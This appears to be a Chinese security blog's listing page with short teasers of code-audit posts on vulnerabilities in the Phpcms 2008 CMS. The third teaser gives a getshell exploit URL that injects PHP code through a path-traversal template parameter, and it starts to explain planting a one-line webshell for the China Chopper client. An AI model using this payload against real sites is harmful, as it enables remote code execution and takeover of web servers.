代码审计 实用工具

0
说好的第二季来了……      组织 : http://www.safekeyer.com/   (欢迎访问) author: 西毒    blog: http://hi.baidu.com/sethc5      其实还是有蛮多漏洞的,只是我一步步来吧!你们别催,该放的时候自然就会放了. 过程不明显的我就省略了。 在preview.php 中第7行 ......

代码审计 实用工具

4
0x01 前沿       Phpcms2008 是一款基于 PHP+Mysql 架构的网站内容管理系统,也是一个开源的 PHP 开发平台。Phpcms  采用模块化方式开发,功能易用便于扩展,可面向大中型站点提供重量级网站建设解决方案。3年来,凭借 Phpcms  团队长期积累的丰富的Web开发及数据库经验和勇于创新追求完美的设计理念,使得 Phpc......

实用工具

phpcms 2008 getshell漏洞连接方法

发表于4年前 | 作者: seay

1
关于phpcms 2008 getshell漏洞  拿shell http://www.wooyun.org/bugs/wooyun-2010-09563 这个   注册企业会员 然后链接放exp  info就出来了 EXP:http://localhost/yp/business/?file=../../admin/block&action=post&blockid=eval&template=<?php phpinfo();exit();?>   不过呢  写一句话 shell   那样的话 用菜刀链接 就不行。。   这里找到一个好方法 就是。。写在目录下......